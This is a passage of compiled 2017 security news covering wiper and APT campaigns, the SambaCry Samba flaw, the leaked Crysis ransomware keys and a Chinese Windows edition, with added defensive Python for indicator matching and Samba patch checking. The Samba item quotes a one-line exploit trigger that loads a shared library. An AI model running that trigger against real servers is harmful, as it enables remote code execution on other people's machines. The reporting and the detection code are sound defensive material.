Since Microsoft has not released any patch for this vulnerability, users and enterprises are advised to upgrade their systems to newer versions to secure themselves from EsteemAudit attacks.
"Of the three remaining exploits, “EnglishmanDentist,” “EsteemAudit,” and “ExplodingCan,” none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk," Microsoft says.
If it is hard for your enterprise to upgrade its systems immediately, it should secure its RDP port by either disabling it or putting it behind a firewall.
Meanwhile, enSilo has released a patch to help Windows XP and Server 2003 users secure their machines against EsteemAudit. You can apply the patch to secure your systems, but keep in mind, that it is not an official patch from Microsoft.
If you have doubts about the patch: enSilo is a reputable cyber security company, though I expect Microsoft to release an official patch before any outcry like the one over WannaCry.


IT threat evolution Q1 2017
25.5.2017 Kaspersky Analysis

The aim of most targeted attack campaigns is to steal sensitive data. However, this isn’t always the goal. Sometimes attackers erase data instead of – or as well as – trying to gain access to confidential information. We’ve seen several wiper attacks in recent years. They include Shamoon (also known as ‘Disttrack’), believed to have been used to erase data on more than 30,000 computers at Saudi Aramco in 2012, and Dark Seoul, used in the attack on Sony Pictures in 2013.

Shamoon re-appeared in November 2016, targeting organisations in various critical and economic sectors in Saudi Arabia. So far we have observed three waves of attacks using the Shamoon 2.0 malware – activated on 17 November 2016, 29 November 2016 and 23 January 2017.

While the attacks share many similarities with the earlier wave of attacks, they now feature new tools and techniques. The attackers start by obtaining administrator credentials for the target network. Then they build a custom wiper (Shamoon 2.0) which uses the stolen credentials for lateral movement across the organisation. Finally, the wiper activates on a predefined date, leaving the infected computers unusable. The final stage of the attack is completely automated and doesn’t rely on communication with the attacker’s C2 (Command-and-Control) center.

Shamoon 2.0 also includes a ransomware component. This has yet to be used in the wild, so it’s unknown whether the attackers would use this part of the platform for financial gain or for idealistic purposes.

While investigating the Shamoon attacks, we discovered a previously unknown wiper. This malware, which we’ve named StoneDrill, also seems to target organisations in Saudi Arabia. There are similarities in style to Shamoon, with additional features designed to help it evade detection. One of the victims of StoneDrill, observed via the Kaspersky Security Network (KSN), is located in Europe (and operates in the petro-chemicals sector), suggesting that the attackers might be expanding their wiping operations beyond the Middle East.

The most significant difference between the two relates to the wiping process. Shamoon uses a disk driver for direct access to the disk, whereas StoneDrill injects the wiper directly into the victim’s preferred browser.

StoneDrill also shares similarities with an APT group known as NewsBeef (also known as ‘Charming Kitten’), so-called because of its use of the Browser Exploitation Framework (BeEF). These similarities include familiar WinMain and OS signatures, update commands and C2 server names. It isn’t known whether the groups behind Shamoon and StoneDrill are the same, or are just aligned in terms of interests and the regions they target – the latter seems most likely to us.

In addition to the wiping module, StoneDrill also includes a backdoor that has been used to run espionage operations against a number of targets.

You can find the full report on Shamoon 2.0 and StoneDrill here. By subscribing to our APT intelligence reports, you can get access to our investigations and discoveries as they happen, including comprehensive technical data.

EyePyramid

As we’ve seen before, targeted attacks don’t have to be technically advanced in order to be successful. In January 2016, the arrest of two suspects by Italian police brought to light a series of cyber-attacks that targeted prominent politicians, bankers, freemasons and members of law enforcement agencies.

The malware used in the attacks, called ‘EyePyramid’, was unsophisticated, but nevertheless successful enough to enable the attackers to gain access to all resources on their victims’ computers. The police investigation revealed 100 active victims in the server used to host the malware, but there were indications that the attackers had targeted around 1,600 victims in the last few years. Their victims – located mostly in Italy – included law firms, consultancy services, universities and Vatican cardinals.

The Italian police report didn’t include technical details about how the malware was spread – other than revealing that spear-phishing was used. However, it did identify a number of C2 servers and e-mail addresses used by the attackers to exfiltrate stolen data. Using this information, we created a YARA rule, based on custom e-mail addresses, C2 servers, licences for the custom mailing library used by the attackers and specific IP addresses used in the attack. Then we ran it through our systems to see if it matched any known samples. Our initial YARA rule highlighted two samples, which enabled us to create a more specific YARA rule that identified a further 42 samples in our collection. A further search revealed more details about EyePyramid. The attacks relied on social engineering to trick victims into opening and running infected files attached to the spear-phishing e-mails. The attachments used were ZIP and 7ZIP archives which contained the malware. The attackers used multiple spaces to try and mask the extension of the file – underlining the low level of sophistication of the attacks.

Based on the compilation time-stamps of the samples, which appear to be legitimate, most samples used in the attacks were compiled in 2014-15.

It’s clear that cybercriminals can achieve success even when the malware they use is neither sophisticated nor hard to detect. From the poor OPSEC (operational security) employed in the campaign (for example, using IP addresses associated with their own company and discussing victims in regular phone calls and using WhatsApp), it’s clear that the attackers were amateurs. Nevertheless, they were able to operate for many years and managed to steal gigabytes of data from their victims.
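Two of the techniques in the EyePyramid write-up above lend themselves to simple, reusable checks: the indicator-driven YARA rule that was used to pivot from the police report to samples in a collection, and the padded attachment names that hide an executable extension behind a run of spaces. The block below is an added example written for this page, not Kaspersky's tooling: `match_rule()` is a small YARA-style matcher (named strings plus an "N of them" condition) and `masked_extension()` flags the padded-name trick. Every indicator value, sample blob and filename in it is a constructed placeholder, not a real EyePyramid IOC.

```python
"""Two checks modelled on the EyePyramid write-up above: flag attachment names that
hide an executable extension behind a run of spaces, and triage samples with a small
YARA-style indicator rule.  Added example, not Kaspersky's tooling; every indicator
value here is a constructed placeholder, not a real EyePyramid IOC."""
import re

EXECUTABLE_EXTENSIONS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "jar"}


def masked_extension(filename, min_spaces=3):
    """True for names like 'Report 2015.pdf<many spaces>.exe': a document-looking
    decoy, a run of whitespace to push the real extension out of view, then an
    executable extension."""
    stem, dot, ext = filename.rpartition(".")
    if not dot or ext.lower() not in EXECUTABLE_EXTENSIONS:
        return False
    return re.search(r"\S\s{%d,}$" % min_spaces, stem) is not None


def suspicious_attachments(archive_members):
    """Filter the member names of an e-mail's ZIP/7ZIP attachment."""
    return [name for name in archive_members if masked_extension(name)]


# A rule in the spirit of the initial YARA rule built from the police report:
# custom e-mail addresses, C2 names, the mailing-library licence string, attacker IPs.
# Values are placeholders (RFC 2606 reserved names, RFC 5737 documentation address).
RULE = {
    "name": "eyepyramid_like_indicators",
    "strings": {
        "mail_1": b"drop@exfil-placeholder.invalid",
        "mail_2": b"logs@exfil-placeholder.invalid",
        "c2_1": b"update.c2-placeholder.invalid",
        "license": b"MAILLIB-LICENSE-PLACEHOLDER-0000",
        "ip_1": b"203.0.113.45",
    },
    "condition": 2,          # YARA: "2 of them"
}


def match_rule(data, rule):
    """Names of the rule strings found in data, or [] if fewer than the condition."""
    hits = sorted(name for name, needle in rule["strings"].items() if needle in data)
    return hits if len(hits) >= rule["condition"] else []


def triage(samples, rule):
    """{label: matched_strings} for each sample blob; only matching samples are kept."""
    return {label: hits for label, hits in
            ((label, match_rule(blob, rule)) for label, blob in samples.items()) if hits}


# Constructed sample blobs standing in for files in a malware collection.
SAMPLES = {
    "sample_a": b"\x00cfg\x00smtp=drop@exfil-placeholder.invalid\x00key=MAILLIB-LICENSE-PLACEHOLDER-0000\x00",
    "sample_b": b"GET /beacon HTTP/1.1\r\nHost: update.c2-placeholder.invalid\r\n",
    "benign": b"MZ\x90\x00 hello world installer\x00",
}

if __name__ == "__main__":
    print(suspicious_attachments(["Invoice 2015.pdf" + " " * 40 + ".exe", "notes.txt"]))
    print(triage(SAMPLES, RULE))
```

The "2 of them" condition is what keeps a single shared string (a C2 name reused by unrelated tooling, say) from pulling in false positives; a sample that carries only `c2_1` is left for the analyst rather than matched, which mirrors the two-step rule tightening described in the text.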

You can read our full report on EyePyramid here.

Breaking the weakest link of the strongest chain

In the middle of 2016 more than 100 Israeli servicemen were targeted by a cunning threat actor. The attack compromised their devices and exfiltrated data to the attackers’ C2 server.

The IDF (Israeli Defense Forces) C4I and the IDF Information Security Department unit, with Kaspersky Lab researchers, obtained a list of the victims – all IDF servicemen serving around the Gaza strip.

This campaign, which experts believe is still in its early stages, targets Android OS devices. Once the device has been compromised, a process of sophisticated intelligence gathering begins, exploiting the phone’s video and audio capabilities, SMS functions and location.

The attacks are unsophisticated, relying heavily on social engineering techniques. The attackers lure their victims into installing a malicious application, while continuously attempting to acquire confidential information using social networks: the group seems particularly active on Facebook Messenger. Most of the avatars used by the attackers (virtual participants in the social engineering stage of the attack) lure the victims using sexual themes: for example, asking the victim to send explicit photographs and, in return, sending fake photos of teenage girls. The avatars pretend to be from different countries such as Canada, Germany, Switzerland and others.

The victim is tricked into downloading an app from a malicious URL. The app collects data from the victim’s phone, including general information (network operator, GPS location, IMEI, etc.), contacts, browsing history, SMS messages and pictures. The app is also able to record video and audio.

The IDF, which led the research along with Kaspersky lab researchers, believes that this is just the opening shot of a wider campaign that is designed to capture data on how ground forces are distributed, the tactics and equipment the IDF uses and real-time intelligence.

You can read our full report on this campaign here.

The non-persistence of memory

During an incident response, security specialists hunt for any artefacts that attackers have left behind in the victim’s network. This includes inspecting log files, looking for files on the hard drive, looking at the registry and checking memory.

However, each of these has a different ‘shelf-life’: in other words, the clues will be available to an analyst for a shorter or longer time, depending on where they’re located. Data stored on a hard drive will probably be available to a forensic analyst for a long time: although, as we saw with Duqu 2.0, sophisticated malware might deliberately remove all traces from the hard drive after installation, leaving itself in memory only. This is why memory forensics is critical to the analysis of malware and its functions.

Another important aspect of an attack is the tunnels that are installed in the network by an attacker. Cybercriminals (such as Carbanak and GCMAN) might use PLINK for this purpose; Duqu 2.0 used a special driver.

In our predictions for 2017 we forecast an increase in ephemeral infections – memory-resident malware intended for general reconnaissance, with no interest in persistence. In highly sensitive environments, where stealth is essential, attackers might well be satisfied to operate until the malware is cleared from memory during a re-boot, since this will reduce the likelihood of the malware being detected and their operation being compromised.

During a recent incident response our experts found that both memory-based malware and tunnelling had been implemented in a bank attack using standard Windows utilities such as SC and NETSH. The threat was originally discovered by the bank’s security team after they detected Meterpreter code inside the physical memory of a domain controller. We participated in the forensic analysis following this detection and discovered the use of PowerShell scripts within the Windows registry. We also discovered that the NETSH utility was used for tunnelling traffic from the victim’s host to the attacker’s C2.

You can read the details of our investigation here.

Using the Kaspersky Security Network we found more than 100 enterprise networks infected with malicious PowerShell scripts in the registry.

We don’t know if they were all infected by the same attacker. During our analysis of the affected bank we learned that the attackers had used several third level domains and domains in the .GA, .ML and .CF ccTLDs. The benefit, for the attackers, of using such domains is that they are free and don’t include WHOIS information after the domain expiration. The fact that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information makes attribution almost impossible. The closest groups with the same TTPs are Carbanak and GCMAN.

Techniques like this are becoming more common, especially in attacks against financial institutions. Exfiltration of data can be achieved using standard utilities and some tricks, without the need for malware. Such ephemeral attacks highlight the need for sophisticated, proactive technology in anti-malware solutions, such as Kaspersky Lab’s System Watcher.

KopiLuwak: a new JavaScript payload from Turla

The Russian-speaking APT group Turla (known variously as ‘Snake’, ‘Uroburos’, ‘Venomous Bear’ and ‘KRYPTON’) has been active since at least 2007 (and maybe even longer). Its activities have been traced to many high-profile incidents, including the 2008 attack against the US Central Command (the Buckshot Yankee incident) and, more recently, the attack against the Swiss military contractor, RUAG. We’ve discussed its activities on a number of occasions (here, here, here and here). The group intensified its activities in 2014, targeting Ukraine, EU-related institutions, governments of EU countries, global foreign affairs ministries, media companies and possibly corruption-related targets in Russia. In 2015 and 2016 the group diversified its activities, switching from the Epic Turla watering-hole framework to the Gloog Turla framework, which is still active. The group also expanded its spear-phishing activities with the Skipper/WhiteAtlas attacks, which made use of new malware. Recently, the group has intensified its satellite-based C2 registrations ten-fold compared to the 2015 average.

In January, John Lambert from Microsoft (@JohnLaTwC) tweeted about a malicious document that dropped a ‘very interesting .JS backdoor’. Since the end of November 2016, Kaspersky Lab has observed Turla using this new JavaScript payload and specific macro variant. This is a technique we’ve observed before with Turla’s ‘ICEDCOFFEE’ payloads (detailed in a private report from June 2016 which is available to customers of Kaspersky APT Intelligence Services). While the delivery method is somewhat similar to ICEDCOFFEE, the JavaScript differs greatly and appears to have been created mainly to avoid detection.

The targeting of this new malware is consistent with previous campaigns conducted by Turla, focusing on foreign ministries and other governmental organizations throughout Europe. However, the frequency is much lower than ICEDCOFFEE, with victim organizations numbering in the single digits (as of January 2017). We strongly believe that this new JavaScript will be used more heavily in the future as a first-stage delivery mechanism and victim profiler.

The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the attackers to run arbitrary commands via Wscript.

Full details on KopiLuwak can be found here.

The document contains a malicious macro that’s very similar to macros used previously by Turla to deliver Wipbot, Skipper, and ICEDCOFFEE. The Turla group continues to rely heavily on embedded macros in Office documents. This might seem to be a basic tactic for such a sophisticated attacker, but it has helped them to compromise high-value targets. We would advise organisations to disable macros and not allow employees to enable such content unless it’s absolutely necessary.

The lure document above shows an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus. Based on the name of the document, ‘National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc’, we presumed it may have been sent from the Qatar Ambassador’s secretary to the Ministry of Foreign Affairs, possibly indicating that the Turla group already had control of at least one system within Qatar’s diplomatic network.

The best defence against targeted attacks is a multi-layered approach that combines traditional anti-virus technologies with patch management, host intrusion detection and a default-deny whitelisting strategy. According to a study by the Australian Signals Directorate, 85 per cent of targeted attacks analysed could have been stopped by employing four simple mitigation strategies: application whitelisting, updating applications, updating operating systems and restricting administrative privileges.

Malware stories

Stand and deliver: your money or your files!

In eighteenth century Britain (and elsewhere) travellers could be waylaid by a highwayman – a thief who held up coaches on the public highway and demanded that those on board hand over their money and other valuables. The highwayman would typically issue the challenge – ‘Stand and deliver: your money or your life!’ Ransomware is a version of such highway robbery for the digital age – with the difference that it’s our data that is held hostage and the ‘highwayman’s’ ransom demand is displayed on the screen.

There were more than 1,445,000 ransomware attacks in 2016, on businesses as well as individuals. The huge growth we’ve seen in recent years is fuelled by the success that cybercriminals have had with this type of malware – ransomware is easily monetised and involves a low investment cost per victim.

Out of the 62 new crypto-ransomware families that we discovered last year, at least 47 were developed by Russian-speaking cybercriminals. In February, we published a report on the Russian ransomware economy. It’s clear that the development of ransomware is underpinned by a flexible and user-friendly underground eco-system that allows criminals to launch attack campaigns with almost any level of computer skills and financial resources. Our researchers identified three levels of criminal involvement in the ransomware business.

The first is the creation and update of ransomware families. This requires advanced code-writing skills; and those involved are the most privileged members of the ransomware underground, since they are the key to the whole eco-system. The second is the development and support of affiliate programmes for distributing ransomware. This is done by criminal communities that deliver the ransomware using ancillary tools such as exploit kits and spam. The third is partner participation in such affiliate programmes. Those involved are on the lowest rung of the ladder and their role is to help the owners of affiliate programmes to spread the malware, in return for a cut of the proceeds: the only qualifications required are a willingness to carry out illegal activities and the money to join the affiliate scheme.

We were able to identify several large groups of Russian-speaking criminals specialising in crypto-ransomware development and distribution. These groups might bring together tens of different partners, each with their own affiliate programme. The list of their targets includes not only individual consumers, but small- and medium-sized businesses and even enterprises. While initially targeting organisations in the Russian Federation, these groups are now shifting their attention to companies in other parts of the world. The daily revenue of an affiliate programme might reach tens, or even hundreds, of thousands of dollars: of this, around 60 per cent stays in the pockets of the criminals as net profit.

In March we reported a new ransomware family used in targeted attacks against organizations, named PetrWrap. Once they have gained a foothold in the target company, the attackers use the PsExec tool to install ransomware on all computers. One especially interesting aspect of this ransomware is that the attackers use the well-known Petya ransomware to encrypt data. Although Petya makes use of a ‘Ransomware-as-a-Service’ model, the attackers didn’t make use of this facility. Instead, they include a sample of the Petya ransomware inside the data section of the malware and use Petya to infect their victims’ computers. A special module patches the original Petya ransomware ‘on the fly’. This allows the attackers to hide the fact that they are using Petya.

Targeted ransomware attacks on organizations are becoming more common. The groups using ransomware in targeted attacks typically try to find vulnerable servers or servers with unprotected RDP access. After penetrating an organization’s network they use special frameworks such as Mimikatz to obtain the necessary credentials to install ransomware throughout the network. To protect against such attacks, organizations need to keep their server software up-to-date, use secure passwords for remote access systems, install security solutions on their servers and use security solutions with behavioral detection components on all their endpoints.

The Internet of broken Things

You might remember that in October 2016, cybercriminals used a botnet of Internet-connected home devices (such as IP-enabled cameras, DVRs, CCTV cameras and printers) to launch a DDoS attack. To do this, the attackers infected vulnerable devices with the Mirai malware. This operation was significant not only because it misused Internet of Things (IoT) devices, but also because the DDoS traffic generated exceeded all previous volumes. The DDoS took down a portion of the Internet and was severe enough to initiate investigations by the FBI and the DHS. At the time, they had not ruled out activity by a nation state, because of the overall power of the Mirai botnets. But even the scale of these attacks didn’t require the work of a nation state. Time will tell if nation states choose to hide their destructive activity in plain sight in the IoT – the capabilities are clearly available. It’s possible that we might see a nation state tempted to take down wide swaths of the Internet using this juvenile toolset.

In February, we looked at reports of a cross-platform Win32-based Mirai spreader and botnet in the wild. Some of the public discussions around this suggested that an entirely new IoT bot is spreading to and from Windows devices. But this is not the case: rather, a previously active Windows botnet is now spreading a Mirai bot variant. We hadn’t seen this spreader variant pushing Mirai downloaders until January. But this Windows bot itself is not new. The Windows bot’s method for distributing Mirai is very limited as well – it only delivers the Mirai bots to a Linux host from a Windows host if it successfully brute-forces a remote telnet connection.

So we haven’t seen a sensational hop from Linux Mirai to Windows Mirai. But we do have a new threat and the use of Windows to spread Mirai to previously unavailable resources. In particular, vulnerable SQL servers running Windows can be a problem, because they can be Internet-facing, and have access to private network connected IP-based cameras, DVR, media center software and other internal devices.

It’s unfortunate to see any sort of Mirai crossover between the Linux and Windows platforms. Just as the release of source code for the Zeus banking Trojan brought years of problems for the online community, the release of Mirai IoT bot source code will also bring major problems to the Internet infrastructure for years to come. This is just the start.

In response to the huge problem this poses to the Internet infrastructure, over the past few months our team and CERT have participated in multiple successful C2 take-down efforts that otherwise have posed problems for partners simply providing notifications. While some security researchers may describe these take-downs as ‘whack a mole’, these efforts resulted in relief from Gbps DDoS storms for major networks. We’re happy to partner with more network operators to use our connections with CERTs, law enforcement agencies and other partners around the world, to build on this success.

You can read our report here.

This attack, like others that involve compromised IoT devices, exploited the fact that many people don’t change the manufacturer’s default credentials when they buy a smart device. This makes it easy for attackers to access the device – they simply have to try the known default password. In addition, there are no firmware updates for many devices. IoT devices are also an attractive target for cybercriminals because they often have 24/7 connectivity.

These days we’re surrounded by smart devices. This includes everyday household items such as telephones, televisions, thermostats, refrigerators, baby monitors, fitness bracelets and children’s toys. But it also includes cars, medical devices, CCTV cameras and parking meters. Some homes are even designed now with the ‘smartness’ built in. Ubiquitous Wi-Fi brings all these devices online, as part of the Internet of Things (IoT). These things are designed to make our lives easier. Since everyday objects are able to collect and transfer data automatically, without human interaction, they can operate more effectively and efficiently. However, a world of connected everyday objects means a bigger attack surface for cybercriminals. Unless IoT devices are secured, the personal data they exchange can be compromised, they can be subject to an attack, or they can be used in an attack.

One of the problems associated with IoT devices is that they are often everyday objects that have provided useful functions for much longer than the Internet has been around. So we don’t see the computer within the object. Nowhere is this truer than with children’s toys. In the last two years security and privacy concerns around children’s toys have been raised on a number of occasions (you can read more here, here and here).

In February, similar concerns were raised about the My Friend Cayla doll. The Federal Network Agency, the German telecommunications watchdog, suggested that parents that had bought the doll should destroy it because of these worries.

The best advice for anyone using connected/IoT devices at home is to ensure that the default passwords on all devices are changed (using unique, complex passwords) to prevent them being remotely accessed – this includes home routers, which are the gateway to your home network. The temptation may be for people to want to disconnect all devices in light of such news, but in today’s increasingly connected world, that’s not realistic; although it’s always good to review the functionality of a smart device and disable any functions that you don’t actually need. However, good password ‘housekeeping’ goes a long way to keeping cybercriminals away from your devices. This kind of large-scale attack also highlights the need for manufacturers to consider security by design, rather than as an afterthought.

Data breaches and data dumps

We’ve become accustomed to seeing a steady stream of security breaches month after month; and this quarter has been no exception, including attacks on Barts Health Trust, Sports Direct, Intercontinental Hotels Group and ABTA.

Some breaches result in the theft of sensitive data, highlighting the fact that many companies fail to take adequate steps to defend themselves. Any organisation that holds personal data has a duty of care to secure it effectively. This includes hashing and salting customer passwords and encrypting other sensitive data.

Consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard. One alternative is to use a password manager application to handle all this automatically. It’s also a good idea to use two-factor authentication, where an online provider offers this feature – requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings.

The public dumping of sensitive information has been gathering pace in recent years. This is a trend that we predicted in 2015. ‘Hacktivists’, criminals and state-sponsored attackers alike have embraced the strategic dumping of private pictures, information, customer lists and code to shame their targets. While some of these attacks are strategically targeted, some are also the product of opportunism, taking advantage of poor cyber-security.

In February, WikiLeaks released more than 8,000 documents, referred to as ‘Vault 7’, that describe tactics and tools used to break into computing devices from leading manufacturers, to circumvent installed security solutions and even lay a trail of false flags. The first batch of documents released (dated between 2013 and 2016) included documentation on how to compromise major browsers, smartphones and computers running Windows, Mac OS and Linux. Subsequent dumps of data focused on the development of malware to compromise firmware running on Mac OS and iOS, especially EFI and UEFI firmware; and on methods to evade detection. You can read more here and here.

We can only expect this practice to continue to grow in the future. Consumers and businesses alike should use encryption to secure sensitive data and should ensure that they apply updates as soon as they become available, to reduce the chances that their data will be stolen and dumped online.


7-Year-Old Samba Flaw Lets Hackers Access Thousands of Linux PCs Remotely
25.5.2017 thehackernews Vulnerebility
A 7-year-old critical remote code execution vulnerability has been discovered in the Samba networking software that could allow a remote attacker to take control of affected Linux and Unix machines.
Samba is open-source software (a re-implementation of the SMB networking protocol) that runs on the majority of operating systems available today, including Windows, Linux, UNIX, IBM System 390, and OpenVMS.
Samba allows non-Windows operating systems, like GNU/Linux or Mac OS X, to share network folders, files, and printers with Windows operating systems.
The newly discovered remote code execution vulnerability (CVE-2017-7494) affects all versions newer than Samba 3.5.0, which was released on March 1, 2010.
"All versions of Samba from 3.5.0 onwards are vulnerable to a remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it," Samba wrote in an advisory published Wednesday.
Linux version of EternalBlue Exploit?

According to the Shodan computer search engine, more than 485,000 Samba-enabled computers expose port 445 on the Internet, and according to researchers at Rapid7, more than 104,000 internet-exposed endpoints appeared to be running vulnerable versions of Samba, of which 92,000 are running unsupported versions of Samba.
Since Samba is the SMB protocol implementation on Linux and UNIX systems, some experts are calling it a "Linux version of EternalBlue," the exploit used by the WannaCry ransomware.
...or should I say SambaCry?
Keeping in mind the number of vulnerable systems and ease of exploiting this vulnerability, the Samba flaw could be exploited at large scale with wormable capabilities.
Home networks with network-attached storage (NAS) devices could also be vulnerable to this flaw.
Exploit Code Released! (Bonus: Metasploit Module)

The flaw actually resides in the way Samba handles shared libraries. A remote attacker could use this Samba arbitrary module loading vulnerability to upload a shared library to a writable share and then cause the server to load and execute malicious code.
The vulnerability is hell easy to exploit. Just one line of code is required to execute malicious code on the affected system:
simple.create_pipe("/path/to/target.so")
However, the Samba exploit has already been ported to Metasploit, a penetration testing framework, enabling researchers as well as hackers to exploit this flaw easily.
Patch and Mitigations
The maintainers of Samba have already patched the issue in Samba versions 4.6.4, 4.5.10 and 4.4.14, and are urging those using a vulnerable version of Samba to install the patch as soon as possible.
But if you cannot upgrade to the latest versions of Samba immediately, you can work around the vulnerability by adding the following line to the [global] section of your Samba configuration file smb.conf:
nt pipe support = no
Once added, restart the SMB daemon (smbd) and you are done. Note that this change will prevent clients from fully accessing some network machines and will disable some functions that connected Windows systems expect.
While Linux distribution vendors, including Red Hat and Ubuntu, have already released patched versions for their users, the larger risk comes from NAS devices, which might not be updated as quickly.
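An added example, not code from the article or from the Samba project: a small Python checker that compares the version string printed by `smbd -V` with the fixed releases named above and verifies that the `nt pipe support = no` workaround sits in the [global] section of smb.conf. The smb.conf texts and version strings below are constructed for the demo.

```python
"""
Added example, not from the article or the Samba project: decide whether a
host still needs attention for CVE-2017-7494 from two inputs, the version
string that `smbd -V` prints and the text of its smb.conf. Fixed release
numbers and the workaround line come from the advisory text above.
"""
import re

FIRST_AFFECTED = (3, 5, 0)          # "All versions of Samba from 3.5.0 onwards"
FIXED = {                           # first fixed release per supported branch
    (4, 6): (4, 6, 4),
    (4, 5): (4, 5, 10),
    (4, 4): (4, 4, 14),
}


def parse_version(text):
    """Turn 'Version 4.4.13-Ubuntu' into (4, 4, 13); distro suffixes are ignored."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no Samba version number in %r" % text)
    return tuple(int(x) for x in m.groups())


def version_vulnerable(ver):
    """True if this release number still carries the bug.
    Branches newer than 4.6 post-date the fix. Branches between 3.5 and
    4.3 are flagged because only patch files, not release numbers, exist
    for them (assumption: a vendor backport must be verified by hand)."""
    if ver < FIRST_AFFECTED:
        return False
    branch = ver[:2]
    if branch in FIXED:
        return ver < FIXED[branch]
    return branch < (4, 4)


def parse_smb_conf(text):
    """Minimal smb.conf reader: {section: {parameter: value}}. Samba
    ignores case and whitespace in parameter names, so keys are stored
    lowercased with whitespace removed ('NT Pipe Support' -> 'ntpipesupport')."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            conf[section]["".join(key.split()).lower()] = value.strip()
    return conf


def workaround_applied(smb_conf_text):
    """The parameter is global only: a 'no' inside a share section does
    nothing, so only [global] is consulted. Samba's default is 'yes'."""
    glob = parse_smb_conf(smb_conf_text).get("global", {})
    return glob.get("ntpipesupport", "yes").lower() in ("no", "false", "0")


def assess(version_text, smb_conf_text):
    """'not affected' (< 3.5.0), 'patched', 'mitigated' or 'vulnerable'."""
    ver = parse_version(version_text)
    if ver < FIRST_AFFECTED:
        return "not affected"
    if not version_vulnerable(ver):
        return "patched"
    return "mitigated" if workaround_applied(smb_conf_text) else "vulnerable"


# Constructed inputs for the demo (not taken from any real host).
CONF_WITH_WORKAROUND = """\
[global]
   workgroup = WORKGROUP
   ; added per the advisory workaround
   NT Pipe Support = No

[data]
   path = /srv/data
   writable = yes
"""

# Same line, but placed in a share section where Samba ignores it.
CONF_MISPLACED = """\
[global]
   workgroup = WORKGROUP

[data]
   path = /srv/data
   nt pipe support = no
"""

if __name__ == "__main__":
    for ver in ("Version 4.4.13-Ubuntu", "Version 4.4.14", "Version 3.6.25"):
        print(ver, "->", assess(ver, CONF_WITH_WORKAROUND),
              "/", assess(ver, CONF_MISPLACED))
```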
Craig Williams of Cisco said that given the fact that most NAS devices run Samba and have very valuable data, the vulnerability "has potential to be the first large-scale Linux ransomware worm."
Update: Samba maintainers have also provided patches for older and unsupported versions of Samba.
Meanwhile, Netgear released a security advisory for CVE-2017-7494, saying a large number of its routers and NAS product models are affected by the flaw because they use Samba version 3.5.0 or later.
However, the company has so far released firmware fixes only for ReadyNAS products running OS 6.x.


Master Keys for Crysis ransomware released on a forum
25.5.2017 securityaffairs Ransomware

Researchers at ESET security firm have discovered that someone has released 200 master keys for the latest variants of the prominent Crysis ransomware.
While security experts continue to investigate the WannaCry attack, someone has released 200 master keys for the latest variants of the prominent Crysis ransomware. The files encrypted by this version have the .wallet and .onion extensions added to their original names.

Antivirus firm ESET has used the leaked information to develop the ESET Crysis decrypting tool that is available for download on the company “utilities page.”

The master keys were posted by a new member of a forum at BleepingComputer.com that aims to help victims of this threat.


This is the third time that someone published the master key for the Crysis ransomware.

“This has become a habit of the Crysis operators lately – with this being the third time keys were released in this manner. Since the last set of decryption keys was published, Crysis ransomware attacks have been detected by our systems over ten thousand times.” reads the blog post published by ESET.

Decryption tools allow victims of the ransomware-based campaigns to restore their files without paying the ransom to the criminal organizations.

Recently the Quarkslab researcher, Adrien Guinet, has published a software, called Wanadecrypt, he used to recover the decryption key required to restore the files on an infected XP computer. The expert successfully tested the Wanadecrypt software on a small number of infected XP computers, but it is not clear if the technique works on every PC.

The technique devised by Adrien Guinet allows retrieving the secret encryption keys used by the WannaCry ransomware for free, it works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 operating systems.

Security researcher Benjamin Delpy developed another tool called WanaKiwi that not only retrieves the prime numbers from memory but also automates the whole decryption process for the WannaCry-infected files.

WanaKiwi works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 as explained by Matt Suiche from security firm Comae Technologies.

Despite the efforts of law enforcement and security firms in the fight against ransomware, this category of malware remains one of the most dangerous computer threats. Prevention is essential in keeping users safe.

“Prevention is essential in keeping users safe. Therefore, we recommend that all users keep their operating systems and software updated, use reliable security solutions with multiple layers of protection, and regularly back up all important and valuable data at an offline location (such as external storage).” concluded ESET.


Microsoft Unveils Special Version of Windows 10 For Chinese Government
25.5.2017 thehackernews IT
China is very strict about censorship, which is why the country has become very paranoid when it comes to adopting foreign technologies.
The country banned Microsoft's Windows operating system on government computers in 2014 amid concerns about security and US surveillance.
Even in the wake of that, China had been pushing its custom version of Windows XP and its forked version of Ubuntu Linux.
To deal with this issue and target the world's largest market, Microsoft's CEO for the Greater China region last year confirmed that the company was working on a Chinese version of Windows 10 that included "more management and security controls" and less bloatware.
Now, Microsoft has just announced a new version of its Windows 10, which is now ready for Chinese government agencies to use.
At its event in Shanghai on Tuesday, Microsoft announced Windows 10 China Government Edition, specifically designed for the Chinese government. The OS is based on Windows 10 Enterprise Edition, but with a few tweaks to keep Chinese officials happy.
Windows 10 Enterprise Edition already provides several security, identity, and manageability features governments and enterprises need, but Windows 10 China Government Edition will let the country use the management features to monitor and deploy updates as needed, manage telemetry, and use its own encryption algorithms.
Designed to work with Chinese Encryption Algorithms
Microsoft enables the Chinese government to use its own encryption algorithms in Windows 10 China Government Edition in order to secure data that it does not want others to see.
Allows Removal of Unwanted Apps
The Chinese version of Windows 10 does not allow access to features that are not needed by Chinese government employees like Microsoft's OneDrive service that let people store their documents and files on Microsoft-controlled data centers.
Apparently, the Chinese officials don't want anyone to access their data, so they will keep their data locked down on their own computers in an attempt to have full control over it.
Manage Telemetry Data Collection & Updates
